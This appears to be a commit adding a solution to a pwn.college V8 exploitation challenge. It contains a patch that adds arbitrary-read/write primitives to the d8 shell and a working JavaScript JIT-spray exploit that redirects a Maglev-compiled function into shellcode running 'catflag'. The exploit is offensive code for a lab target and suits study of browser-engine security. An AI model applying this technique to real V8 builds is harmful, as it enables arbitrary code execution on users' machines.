Moved JavaScript/PwnCollegeV8Exploitation/ to PwnCollege/V8Exploitation/
This commit is contained in:
Jack Ren
45
PwnCollege/V8Exploitation/Level2/Exploit.js
Normal file
45
PwnCollege/V8Exploitation/Level2/Exploit.js
Normal file
@@ -0,0 +1,45 @@
|
||||
// Integrated Builtin:
|
||||
// - int32 GetAddressOf(obj);
|
||||
// - int32 ArbRead32(int32 cage_addr);
|
||||
// - void ArbWrite32(int32 cage_addr, int32 value);
|
||||
|
||||
// To execute shellcode, we need JIT spray instead of writing RWX segment.
|
||||
// Because we cannot write in the 64-bit address space.
|
||||
|
||||
// RWXAddr: Function -> code(+0xC) -> instruction_start(+0x14)
|
||||
// JIT Spray Double Constant Offset: RWXAddr + 0x6B
|
||||
|
||||
function shellcode() {
|
||||
// JIT spray machine code form of `execve("catflag", NULL, NULL)`
|
||||
return [
|
||||
1.9995716422075807e-246,
|
||||
1.9710255944286777e-246,
|
||||
1.97118242283721e-246,
|
||||
1.971136949489835e-246,
|
||||
1.9711826272869888e-246,
|
||||
1.9711829003383248e-246,
|
||||
-9.254983612527998e+61
|
||||
];
|
||||
}
|
||||
for (let i = 0; i < 100000; i++) shellcode(); // Trigger MAGLEV compilation
|
||||
|
||||
function unptr(v) {
|
||||
return v & 0xfffffffe;
|
||||
}
|
||||
|
||||
function ptr(v) {
|
||||
return v | 1;
|
||||
}
|
||||
|
||||
let shellcode_addr = GetAddressOf(shellcode);
|
||||
console.log("Address of shellcode: " + shellcode_addr.toString(16));
|
||||
let code_addr = unptr(ArbRead32(shellcode_addr + 0xC));
|
||||
console.log("Address of code: " + code_addr.toString(16));
|
||||
let instruction_start_addr = code_addr + 0x14;
|
||||
let instruction_start = ArbRead32(instruction_start_addr);
|
||||
console.log("instruction_start: " + instruction_start.toString(16));
|
||||
ArbWrite32(instruction_start_addr, instruction_start + 0x6B);
|
||||
shellcode();
|
||||
|
||||
// %DebugPrint(shellcode);
|
||||
// %SystemBreak();
|
||||
20
PwnCollege/V8Exploitation/Level2/README.md
Normal file
20
PwnCollege/V8Exploitation/Level2/README.md
Normal file
@@ -0,0 +1,20 @@
|
||||
# Level 2
|
||||
|
||||
## Problem
|
||||
|
||||
Given the following primitves:
|
||||
- AddressOf
|
||||
- Arbitrary Read & Write in Sandbox
|
||||
|
||||
## Key Knowledge
|
||||
|
||||
- [Pointer Compression in V8](https://v8.dev/blog/pointer-compression)
|
||||
- V8 Optimization Tiers
|
||||
- [Intepreter Ignition](https://v8.dev/blog/sparkplug)
|
||||
- [Non-optimizing JavaScript compiler Sparkplug](https://v8.dev/blog/sparkplug)
|
||||
- [Mid-tier optimizing compiler Maglev](https://v8.dev/blog/maglev)
|
||||
- Top-tier optimizing compiler [Turbofan](https://v8.dev/docs/turbofan) / [Turboshaft](https://v8.dev/blog/holiday-season-2023)
|
||||
- [V8 Native Syntaxs](https://v8.dev/docs/builtin-functions)
|
||||
- [V8引擎漏洞分析环境与调试方法基础](https://gtoad.github.io/2019/07/25/V8-Debug/)
|
||||
- [JIT Spray in V8](https://www.matteomalvica.com/blog/2024/06/05/intro-v8-exploitation-maglev/#jit-spraying-shellcode)
|
||||
- [Shellcraft of Pwntools](https://docs.pwntools.com/en/stable/shellcraft/amd64.html)
|
||||
1
PwnCollege/V8Exploitation/Level2/REVISION
Normal file
1
PwnCollege/V8Exploitation/Level2/REVISION
Normal file
@@ -0,0 +1 @@
|
||||
5a2307d0f2c5b650c6858e2b9b57b335a59946ff
|
||||
10
PwnCollege/V8Exploitation/Level2/args.gn
Normal file
10
PwnCollege/V8Exploitation/Level2/args.gn
Normal file
@@ -0,0 +1,10 @@
|
||||
is_component_build = false
|
||||
is_debug = false
|
||||
target_cpu = "x64"
|
||||
v8_enable_sandbox = false
|
||||
v8_enable_backtrace = true
|
||||
v8_enable_disassembler = true
|
||||
v8_enable_object_print = true
|
||||
dcheck_always_on = false
|
||||
use_goma = false
|
||||
v8_code_pointer_sandboxing = false
|
||||
123
PwnCollege/V8Exploitation/Level2/patch
Normal file
123
PwnCollege/V8Exploitation/Level2/patch
Normal file
@@ -0,0 +1,123 @@
|
||||
diff --git a/src/d8/d8.cc b/src/d8/d8.cc
|
||||
index facf0d86d79..6b31fe2c371 100644
|
||||
--- a/src/d8/d8.cc
|
||||
+++ b/src/d8/d8.cc
|
||||
@@ -1283,6 +1283,64 @@ struct ModuleResolutionData {
|
||||
|
||||
} // namespace
|
||||
|
||||
+void Shell::GetAddressOf(const v8::FunctionCallbackInfo<v8::Value>& info) {
|
||||
+ v8::Isolate* isolate = info.GetIsolate();
|
||||
+
|
||||
+ if (info.Length() == 0) {
|
||||
+ isolate->ThrowError("First argument must be provided");
|
||||
+ return;
|
||||
+ }
|
||||
+
|
||||
+ internal::Handle<internal::Object> arg = Utils::OpenHandle(*info[0]);
|
||||
+ if (!IsHeapObject(*arg)) {
|
||||
+ isolate->ThrowError("First argument must be a HeapObject");
|
||||
+ return;
|
||||
+ }
|
||||
+ internal::Tagged<internal::HeapObject> obj = internal::Cast<internal::HeapObject>(*arg);
|
||||
+
|
||||
+ uint32_t address = static_cast<uint32_t>(obj->address());
|
||||
+ info.GetReturnValue().Set(v8::Integer::NewFromUnsigned(isolate, address));
|
||||
+}
|
||||
+
|
||||
+void Shell::ArbRead32(const v8::FunctionCallbackInfo<v8::Value>& info) {
|
||||
+ Isolate *isolate = info.GetIsolate();
|
||||
+ if (info.Length() != 1) {
|
||||
+ isolate->ThrowError("Need exactly one argument");
|
||||
+ return;
|
||||
+ }
|
||||
+ internal::Handle<internal::Object> arg = Utils::OpenHandle(*info[0]);
|
||||
+ if (!IsNumber(*arg)) {
|
||||
+ isolate->ThrowError("Argument should be a number");
|
||||
+ return;
|
||||
+ }
|
||||
+ internal::PtrComprCageBase cage_base = internal::GetPtrComprCageBase();
|
||||
+ internal::Address base_addr = internal::V8HeapCompressionScheme::GetPtrComprCageBaseAddress(cage_base);
|
||||
+ uint32_t addr = static_cast<uint32_t>(internal::Object::NumberValue(*arg));
|
||||
+ uint64_t full_addr = base_addr + (uint64_t)addr;
|
||||
+ uint32_t result = *(uint32_t *)full_addr;
|
||||
+ info.GetReturnValue().Set(v8::Integer::NewFromUnsigned(isolate, result));
|
||||
+}
|
||||
+
|
||||
+void Shell::ArbWrite32(const v8::FunctionCallbackInfo<v8::Value>& info) {
|
||||
+ Isolate *isolate = info.GetIsolate();
|
||||
+ if (info.Length() != 2) {
|
||||
+ isolate->ThrowError("Need exactly 2 arguments");
|
||||
+ return;
|
||||
+ }
|
||||
+ internal::Handle<internal::Object> arg1 = Utils::OpenHandle(*info[0]);
|
||||
+ internal::Handle<internal::Object> arg2 = Utils::OpenHandle(*info[1]);
|
||||
+ if (!IsNumber(*arg1) || !IsNumber(*arg2)) {
|
||||
+ isolate->ThrowError("Arguments should be numbers");
|
||||
+ return;
|
||||
+ }
|
||||
+ internal::PtrComprCageBase cage_base = internal::GetPtrComprCageBase();
|
||||
+ internal::Address base_addr = internal::V8HeapCompressionScheme::GetPtrComprCageBaseAddress(cage_base);
|
||||
+ uint32_t addr = static_cast<uint32_t>(internal::Object::NumberValue(*arg1));
|
||||
+ uint32_t value = static_cast<uint32_t>(internal::Object::NumberValue(*arg2));
|
||||
+ uint64_t full_addr = base_addr + (uint64_t)addr;
|
||||
+ *(uint32_t *)full_addr = value;
|
||||
+}
|
||||
+
|
||||
void Shell::ModuleResolutionSuccessCallback(
|
||||
const FunctionCallbackInfo<Value>& info) {
|
||||
DCHECK(i::ValidateCallbackInfo(info));
|
||||
@@ -3364,7 +3422,13 @@ Local<FunctionTemplate> Shell::CreateNodeTemplates(
|
||||
|
||||
Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
|
||||
Local<ObjectTemplate> global_template = ObjectTemplate::New(isolate);
|
||||
- global_template->Set(Symbol::GetToStringTag(isolate),
|
||||
+ global_template->Set(isolate, "GetAddressOf",
|
||||
+ FunctionTemplate::New(isolate, GetAddressOf));
|
||||
+ global_template->Set(isolate, "ArbRead32",
|
||||
+ FunctionTemplate::New(isolate, ArbRead32));
|
||||
+ global_template->Set(isolate, "ArbWrite32",
|
||||
+ FunctionTemplate::New(isolate, ArbWrite32));
|
||||
+/* global_template->Set(Symbol::GetToStringTag(isolate),
|
||||
String::NewFromUtf8Literal(isolate, "global"));
|
||||
global_template->Set(isolate, "version",
|
||||
FunctionTemplate::New(isolate, Version));
|
||||
@@ -3385,13 +3449,13 @@ Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
|
||||
global_template->Set(isolate, "readline",
|
||||
FunctionTemplate::New(isolate, ReadLine));
|
||||
global_template->Set(isolate, "load",
|
||||
- FunctionTemplate::New(isolate, ExecuteFile));
|
||||
+ FunctionTemplate::New(isolate, ExecuteFile));*/
|
||||
global_template->Set(isolate, "setTimeout",
|
||||
FunctionTemplate::New(isolate, SetTimeout));
|
||||
// Some Emscripten-generated code tries to call 'quit', which in turn would
|
||||
// call C's exit(). This would lead to memory leaks, because there is no way
|
||||
// we can terminate cleanly then, so we need a way to hide 'quit'.
|
||||
- if (!options.omit_quit) {
|
||||
+/* if (!options.omit_quit) {
|
||||
global_template->Set(isolate, "quit", FunctionTemplate::New(isolate, Quit));
|
||||
}
|
||||
global_template->Set(isolate, "testRunner",
|
||||
@@ -3410,7 +3474,7 @@ Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
|
||||
if (i::v8_flags.expose_async_hooks) {
|
||||
global_template->Set(isolate, "async_hooks",
|
||||
Shell::CreateAsyncHookTemplate(isolate));
|
||||
- }
|
||||
+ }*/
|
||||
|
||||
return global_template;
|
||||
}
|
||||
diff --git a/src/d8/d8.h b/src/d8/d8.h
|
||||
index a19d4a0eae4..476675a7150 100644
|
||||
--- a/src/d8/d8.h
|
||||
+++ b/src/d8/d8.h
|
||||
@@ -507,6 +507,9 @@ class Shell : public i::AllStatic {
|
||||
};
|
||||
enum class CodeType { kFileName, kString, kFunction, kInvalid, kNone };
|
||||
|
||||
+ static void GetAddressOf(const v8::FunctionCallbackInfo<v8::Value>& args);
|
||||
+ static void ArbRead32(const v8::FunctionCallbackInfo<v8::Value>& args);
|
||||
+ static void ArbWrite32(const v8::FunctionCallbackInfo<v8::Value>& args);
|
||||
static bool ExecuteString(Isolate* isolate, Local<String> source,
|
||||
Local<String> name,
|
||||
ReportExceptions report_exceptions,
|
||||
Reference in New Issue
Block a user